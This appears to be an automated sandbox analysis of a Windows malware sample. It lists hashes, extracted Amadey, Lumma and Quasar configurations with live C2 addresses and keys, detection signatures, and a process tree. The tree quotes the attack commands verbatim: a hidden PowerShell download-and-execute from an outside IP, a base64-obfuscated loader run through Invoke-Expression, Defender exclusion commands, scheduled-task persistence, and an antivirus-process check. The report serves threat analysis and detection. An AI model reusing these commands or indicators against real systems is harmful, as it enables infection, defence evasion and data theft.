Analysis

  • max time kernel
    143s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 14:54

General

  • Target

    2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    fbd874278e3584ab6be6a8c49bd7ba9d

  • SHA1

    2a83fce3a5f6da55d0cb7353e5a98aaac2c7fdc2

  • SHA256

    c8e1a3b7374bb21b906a034c52c5fd9350fa87e822956e3f8ad37bfdb5d9cb86

  • SHA512

    d7e66c87b6e871ccfe844f051ef9a0289849602fc759ba3b251ebf891000a1db282d9a7f2d3c9c328da9ed99fc85a593fe3933aa76cd7e0e8c98394d9868d1eb

  • SSDEEP

    24576:7qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:7TvC/MTQYxsWR7a0J

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

https://cosmosyf.top/GOsznj

https://byteplusx.digital/aXweAX

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 12 IoCs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 19 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2644
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4332
    • C:\Users\Admin\AppData\Local\Temp\2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-03-30_fbd874278e3584ab6be6a8c49bd7ba9d_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4056
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 04oVgma8dA2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\d6E1qBu5v.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5164
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn 04oVgma8dA2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\d6E1qBu5v.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:5664
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\d6E1qBu5v.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5436
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NFXFGSIJIODBEMVQGLR3ELPWLP061NZM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2512
          • C:\Users\Admin\AppData\Local\TempNFXFGSIJIODBEMVQGLR3ELPWLP061NZM.EXE
            "C:\Users\Admin\AppData\Local\TempNFXFGSIJIODBEMVQGLR3ELPWLP061NZM.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:5208
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:3560
              • C:\Users\Admin\AppData\Local\Temp\10382080101\2437faf1f4.exe
                "C:\Users\Admin\AppData\Local\Temp\10382080101\2437faf1f4.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:6108
              • C:\Users\Admin\AppData\Local\Temp\10382090101\6623817a91.exe
                "C:\Users\Admin\AppData\Local\Temp\10382090101\6623817a91.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4320
              • C:\Users\Admin\AppData\Local\Temp\10382100101\48e7c1e239.exe
                "C:\Users\Admin\AppData\Local\Temp\10382100101\48e7c1e239.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:2752
                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                  "C:\Users\Admin\AppData\Local\Temp\10382100101\48e7c1e239.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1828
              • C:\Users\Admin\AppData\Local\Temp\10382110101\1b30da8159.exe
                "C:\Users\Admin\AppData\Local\Temp\10382110101\1b30da8159.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:3044
                • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                  "C:\Users\Admin\AppData\Local\Temp\10382110101\1b30da8159.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2064
              • C:\Users\Admin\AppData\Local\Temp\10382120101\41ba94d02c.exe
                "C:\Users\Admin\AppData\Local\Temp\10382120101\41ba94d02c.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1372
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2828
              • C:\Users\Admin\AppData\Local\Temp\10382130101\kO2IdCz.exe
                "C:\Users\Admin\AppData\Local\Temp\10382130101\kO2IdCz.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of WriteProcessMemory
                PID:5272
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c 67e8f4de3ad1d.vbs
                  7⤵
                  • Checks computer location settings
                  • Modifies registry class
                  PID:5784
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
                    8⤵
                      PID:2652
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10382141121\5YB5L4K.cmd"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:5068
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10382141121\5YB5L4K.cmd"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:3948
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                      8⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Drops startup file
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: AddClipboardFormatListener
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5456
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:952
                • C:\Users\Admin\AppData\Local\Temp\10382150101\Rm3cVPI.exe
                  "C:\Users\Admin\AppData\Local\Temp\10382150101\Rm3cVPI.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1600
                • C:\Users\Admin\AppData\Local\Temp\10382160101\TbV75ZR.exe
                  "C:\Users\Admin\AppData\Local\Temp\10382160101\TbV75ZR.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:4084
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1496
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 496
                      8⤵
                      • Program crash
                      PID:2616
                • C:\Users\Admin\AppData\Local\Temp\10382170101\7IIl2eE.exe
                  "C:\Users\Admin\AppData\Local\Temp\10382170101\7IIl2eE.exe"
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:4768
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:3736
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      8⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1000
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:4264
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      8⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4324
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:2640
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 418377
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:4452
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Leon.cab
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:4968
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "BEVERAGES" Compilation
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:5252
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:3524
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:1944
                    • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                      Passwords.com N
                      8⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:4780
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:3908
                • C:\Users\Admin\AppData\Local\Temp\10382180101\u75a1_003.exe
                  "C:\Users\Admin\AppData\Local\Temp\10382180101\u75a1_003.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: MapViewOfSection
                  PID:2708
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    7⤵
                      PID:4796
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe Add-MpPreference -ExclusionPath 'C:'
                        8⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4184
                    • C:\Windows\system32\svchost.exe
                      "C:\Windows\system32\svchost.exe"
                      7⤵
                      • Downloads MZ/PE file
                      • Adds Run key to start application
                      PID:5332
                      • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                        8⤵
                        • Executes dropped EXE
                        PID:1980
                      • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                        8⤵
                        • Executes dropped EXE
                        PID:1976
                  • C:\Users\Admin\AppData\Local\Temp\10382190101\ed1a501064.exe
                    "C:\Users\Admin\AppData\Local\Temp\10382190101\ed1a501064.exe"
                    6⤵
                      PID:4296
